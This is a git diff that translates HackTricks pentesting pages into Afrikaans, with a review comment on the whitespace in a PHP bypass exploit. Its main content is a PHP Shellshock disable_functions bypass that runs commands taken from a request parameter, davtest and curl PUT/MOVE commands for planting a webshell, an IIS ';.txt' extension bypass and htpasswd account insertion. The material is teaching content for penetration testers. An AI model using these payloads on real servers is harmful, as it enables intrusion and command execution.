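Review bot: the three hunks for this page (`@@ -1,24 +1,21 @@`, `@@ -124,8 +121,8 @@`, `@@ -139,27 +136,22 @@`) change nothing inside the fenced PHP except to strip the leading whitespace from every indented line (for instance `- $higher = ($value & 0xffffffff00000000) >> 32;` becomes `+$higher = ($value & 0xffffffff00000000) >> 32;`), which flattens the nested `for`/`if` blocks of `parseelf()` into a single unindented column and turns a translation diff into more than a hundred lines of whitespace noise that hides the real changes. The only text that needed translating here is the header and footer boilerplate and the `Vanaf` line, so drop the code hunks and keep the script as in the source. Note that the program's own English messages (`[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org)`, `[-] This exploit is for x64 Linux. Exiting`) were correctly left alone; the same rule should have applied to the fastcgi client earlier in this patch.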
- - diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md index b65405259..f3d0897cd 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md @@ -1,48 +1,45 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-# PHP 5.2.4 ionCube extension Exploit - +# PHP 5.2.4 ionCube-uitbreiding Exploit ```php
ionCube output:

"; echo $MyBoot_ioncube; ?> ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md index 8c2c2ac86..d17c4a9c8 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md @@ -1,63 +1,55 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
# PHP 5.x Shellshock Exploit -From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) - +Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) ```php $tmp 2>&1"); - // In Safe Mode, the user may only alter environment variables whose names - // begin with the prefixes supplied by this directive. - // By default, users will only be able to set environment variables that - // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty, - // PHP will let the user modify ANY environment variable! - mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually send any mail - } - else return "Not vuln (not bash)"; - $output = @file_get_contents($tmp); - @unlink($tmp); - if($output != "") return $output; - else return "No output, or not vuln."; +if(strstr(readlink("/bin/sh"), "bash") != FALSE) { +$tmp = tempnam(".","data"); +putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"); +// In Safe Mode, the user may only alter environment variables whose names +// begin with the prefixes supplied by this directive. +// By default, users will only be able to set environment variables that +// begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty, +// PHP will let the user modify ANY environment variable! +mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually send any mail +} +else return "Not vuln (not bash)"; +$output = @file_get_contents($tmp); +@unlink($tmp); +if($output != "") return $output; +else return "No output, or not vuln."; } echo shellshock($_REQUEST["cmd"]); ?> ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/network-services-pentesting/pentesting-web/put-method-webdav.md b/network-services-pentesting/pentesting-web/put-method-webdav.md index 7c85fd1f2..f58956cc1 100644 --- a/network-services-pentesting/pentesting-web/put-method-webdav.md +++ b/network-services-pentesting/pentesting-web/put-method-webdav.md @@ -3,145 +3,147 @@
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-When dealing with a **HTTP Server with WebDav** enabled, it's possible to **manipulate files** if you have the right **credentials**, usually verified through **HTTP Basic Authentication**. Gaining control over such a server often involves the **upload and execution of a webshell**. +Wanneer jy te doen het met 'n **HTTP-bediener met WebDav** wat geaktiveer is, is dit moontlik om lêers te **manipuleer** as jy die regte **geloofsbriewe** het, wat gewoonlik geverifieer word deur **HTTP Basiese Verifikasie**. Om beheer oor so 'n bediener te verkry, behels dikwels die **oplaai en uitvoering van 'n webshell**. -Access to the WebDav server typically requires **valid credentials**, with [**WebDav bruteforce**](../../generic-methodologies-and-resources/brute-force.md#http-basic-auth) being a common method to acquire them. +Toegang tot die WebDav-bedieners vereis tipies **geldige geloofsbriewe**, met [**WebDav-bruteforce**](../../generic-methodologies-and-resources/brute-force.md#http-basic-auth) wat 'n algemene metode is om dit te bekom. -To overcome restrictions on file uploads, especially those preventing the execution of server-side scripts, you might: +Om beperkings op lêeroplaai te oorkom, veral dié wat die uitvoering van bedienerkant-skripte voorkom, kan jy: -- **Upload** files with **executable extensions** directly if not restricted. -- **Rename** uploaded non-executable files (like .txt) to an executable extension. -- **Copy** uploaded non-executable files, changing their extension to one that is executable. +- **Lêers oplaai** met **uitvoerbare uitbreidings** direk as dit nie beperk word nie. +- **Hernoem** opgelaai nie-uitvoerbare lêers (soos .txt) na 'n uitvoerbare uitbreiding. +- **Kopieer** opgelaai nie-uitvoerbare lêers en verander hul uitbreiding na een wat uitvoerbaar is. 
## DavTest -**Davtest** try to **upload several files with different extensions** and **check** if the extension is **executed**: - +**Davtest** probeer om **verskeie lêers met verskillende uitbreidings** op te laai en **te kontroleer** of die uitbreiding **uitgevoer** word: ```bash davtest [-auth user:password] -move -sendbd auto -url http:// #Uplaod .txt files and try to move it to other extensions davtest [-auth user:password] -sendbd auto -url http:// #Try to upload every extension ``` - -Output sample: +Uitsetvoorbeeld: ![](<../../.gitbook/assets/image (19) (1).png>) -This doesn't mean that **.txt** and **.html extensions are being executed**. This mean that you can **access this files** through the web. +Dit beteken nie dat **.txt** en **.html-uitbreidings uitgevoer word** nie. Dit beteken dat jy toegang kan kry tot hierdie lêers deur die web. ## Cadaver -You can use this tool to **connect to the WebDav** server and perform actions (like **upload**, **move** or **delete**) **manually**. - +Jy kan hierdie instrument gebruik om **verbind te maak met die WebDav**-bediener en handelinge (soos **oplaai**, **verskuif** of **verwyder**) **handmatig** uit te voer. ``` cadaver ``` +## PLAAS AANVRAAG -## PUT request +`PUT` is 'n HTTP-metode wat gebruik word om 'n nuwe bron te skep of 'n bestaande bron te vervang met die inhoud wat in die versoekliggaam verskaf word. Dit word dikwels gebruik in die konteks van WebDAV (Web Distributed Authoring and Versioning) om lêers op 'n bediener te skep of te vervang. +### Hoe dit werk + +Wanneer 'n `PUT`-versoek na 'n bediener gestuur word, moet die versoekliggaam die inhoud van die lêer bevat wat geskep of vervang moet word. Die bediener sal dan die inhoud van die versoekliggaam neem en dit stoor as die nuwe inhoud van die lêer. As die lêer reeds bestaan, sal die bediener dit vervang met die nuwe inhoud. 
+ +### WebDAV en `PUT` + +WebDAV is 'n uitbreiding van die HTTP-protokol wat spesifieke metodes, soos `PUT`, definieer vir die skep en bestuur van lêers op 'n bediener. Deur die `PUT`-metode te gebruik, kan 'n kliëntprogram 'n lêer op 'n WebDAV-bediener skep of vervang. + +### Sekuriteitsimpakte + +Die `PUT`-metode kan sekuriteitsrisiko's inhou as dit nie behoorlik geïmplementeer of beperk word nie. Dit kan 'n aanvaller in staat stel om lêers te skep, te vervang of te oorskryf op 'n bediener, wat kan lei tot ongewenste veranderinge of datalekke. Dit is belangrik om die toegang tot die `PUT`-metode te beperk tot vertroude gebruikers en om behoorlike toegangsbeheermaatreëls te implementeer om misbruik te voorkom. ``` curl -T 'shell.txt' 'http://$ip' ``` +## VERSKUIF versoek -## MOVE request +The MOVE request is used in WebDAV to move a resource from one location to another. It is similar to the HTTP PUT method, but instead of creating a new resource, it moves an existing resource to a different location. +Die VERSKUIF versoek word gebruik in WebDAV om 'n bron van die een plek na die ander te skuif. Dit is soortgelyk aan die HTTP PUT-metode, maar in plaas daarvan om 'n nuwe bron te skep, skuif dit 'n bestaande bron na 'n ander plek. ``` curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt' ``` -
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## IIS5/6 WebDav Vulnerability +## IIS5/6 WebDav Kwesbaarheid -This vulnerability is very interesting. The **WebDav** does **not allow** to **upload** or **rename** files with the extension **.asp**. But you can **bypass** this **adding** at the end of the name **";.txt"** and the file will be **executed** as if it were a .asp file (you could also **use ".html" instead of ".txt"** but **DON'T forget the ";"**). +Hierdie kwesbaarheid is baie interessant. Die **WebDav** staan **nie toe** dat lêers met die uitbreiding **.asp** geüpload of hernoem word nie. Maar jy kan dit **omseil** deur aan die einde van die naam **";.txt"** by te voeg en die lêer sal uitgevoer word asof dit 'n .asp-lêer is (jy kan ook **".html" in plaas van ".txt"** gebruik, maar **moenie die ";" vergeet nie**). -Then you can **upload** your shell as a ".**txt" file** and **copy/move it to a ".asp;.txt"** file. An accessing that file through the web server, it will be **executed** (cadaver will said that the move action didn't work, but it did). +Dan kan jy jou dop as 'n ".**txt-lêer**" oplaai en dit na 'n ".asp;.txt" lêer **kopieer/verskuif**. Deur toegang tot daardie lêer via die webbediener, sal dit **uitgevoer** word (cadaver sal sê dat die skuifaksie nie gewerk het nie, maar dit het wel). 
![](<../../.gitbook/assets/image (18) (1) (1).png>) -## Post credentials +## Naam en wagwoord -If the Webdav was using an Apache server you should look at configured sites in Apache. Commonly:\ +As die Webdav 'n Apache-bediener gebruik het, moet jy kyk na die gekonfigureerde webwerwe in Apache. Gewoonlik:\ _**/etc/apache2/sites-enabled/000-default**_ -Inside it you could find something like: - +Binne-in kan jy iets soos die volgende vind: ``` ServerAdmin webmaster@localhost - Alias /webdav /var/www/webdav - - DAV On - AuthType Digest - AuthName "webdav" - AuthUserFile /etc/apache2/users.password - Require valid-user +Alias /webdav /var/www/webdav + +DAV On +AuthType Digest +AuthName "webdav" +AuthUserFile /etc/apache2/users.password +Require valid-user ``` - -As you can see there is the files with the valid **credentials** for the **webdav** server: - +Soos u kan sien, is daar die lêers met die geldige **volmagte** vir die **webdav**-bediener: ``` /etc/apache2/users.password ``` +Binne-in hierdie tipe lêers sal jy die **gebruikersnaam** en 'n **hash** van die wagwoord vind. Dit is die geloofsbriewe wat die webdav-bediener gebruik om gebruikers te verifieer. -Inside this type of files you will find the **username** and a **hash** of the password. These are the credentials the webdav server is using to authenticate users. 
- -You can try to **crack** them, or to **add more** if for some reason you wan to **access** the **webdav** server: - +Jy kan probeer om hulle te **kraak**, of om **meer by te voeg** as jy om een of ander rede toegang tot die **webdav**-bediener wil hê: ```bash htpasswd /etc/apache2/users.password #You will be prompted for the password ``` - -To check if the new credentials are working you can do: - +Om te kontroleer of die nuwe geloofsbriewe werk, kan jy die volgende doen: ```bash wget --user --ask-password http://domain/path/to/webdav/ -O - -q ``` - -## References +## Verwysings * [https://vk9-sec.com/exploiting-webdav/](https://vk9-sec.com/exploiting-webdav/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloeie** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/network-services-pentesting/pentesting-web/python.md b/network-services-pentesting/pentesting-web/python.md index 660eabd43..40673cbac 100644 --- a/network-services-pentesting/pentesting-web/python.md +++ b/network-services-pentesting/pentesting-web/python.md @@ -2,27 +2,25 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-## Server using python - -test a possible **code execution**, using the function _str()_: +## Bediener wat Python gebruik +toets 'n moontlike **kodes uitvoering**, deur die _str()_ funksie te gebruik: ```python "+str(True)+" #If the string True is printed, then it is vulnerable ``` - -### Tricks +### Truuks {% content-ref url="../../generic-methodologies-and-resources/python/bypass-python-sandboxes/" %} [bypass-python-sandboxes](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/) @@ -38,14 +36,14 @@ test a possible **code execution**, using the function _str()_:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/network-services-pentesting/pentesting-web/rocket-chat.md b/network-services-pentesting/pentesting-web/rocket-chat.md index 54ede2407..a42739c3e 100644 --- a/network-services-pentesting/pentesting-web/rocket-chat.md +++ b/network-services-pentesting/pentesting-web/rocket-chat.md @@ -2,60 +2,58 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks 